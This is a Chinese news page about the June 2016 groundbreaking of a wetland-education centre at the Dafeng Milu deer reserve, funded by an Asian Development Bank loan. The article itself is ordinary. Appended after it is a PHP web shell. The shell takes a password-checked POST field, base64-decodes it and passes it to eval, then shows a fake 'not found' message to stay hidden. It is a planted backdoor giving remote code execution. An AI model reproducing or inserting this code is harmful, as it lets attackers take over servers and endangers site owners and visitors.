亚行项目专栏

首页 > 亚行项目专栏 >

    麋鹿宣教中心破土动工啦

               2016616日上午918分,亚行贷款盐城湿地保护项目江苏省大丰麋鹿国家级自然保护区宣教中心建设工程在中华麋鹿园景区新大门口举行开工仪式。保护区全体干部、职工以及工程建设公司的代表们都亲临现场,共同见证了这历史性的时刻。

    本项目是我国利用亚洲开发银行贷款资金,开展生态保护的重要工程。自2009年项目建议书批复,经过可行性研究报告批复,再到2015年项目初步设计批复,通过正规招投标,最终到今日开工建设,历时达7年之久。宣教中心工程建筑总面积2000平方米,两层结构,总投资约2000万元,工期4个月。本工程是麋鹿保护区目前单体建筑投资规模最大的项目。

         宣教中心建筑设计理念源自水流的自然之美,外形高低起伏似涌动的波浪,把麋鹿保护区湿地水环境和建筑完美结合。宣教中心建成之后,将通过生物标本、缩微景观、展板等传统手段和声光电多媒体、4D影院、人机互动等高科技手段给人们宣教麋鹿知识、湿地保护知识,让人们感受到巨大的视觉震撼。同时宣教中心将会向中外游客集中展示保护区自然生态系统、动植物资源以及盐城市深厚的人文历史,对提高广大群众的科学普及水平、加强生态环境的保护与研究、促进盐城市文化旅游事业发展等发挥重要作用。

     

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>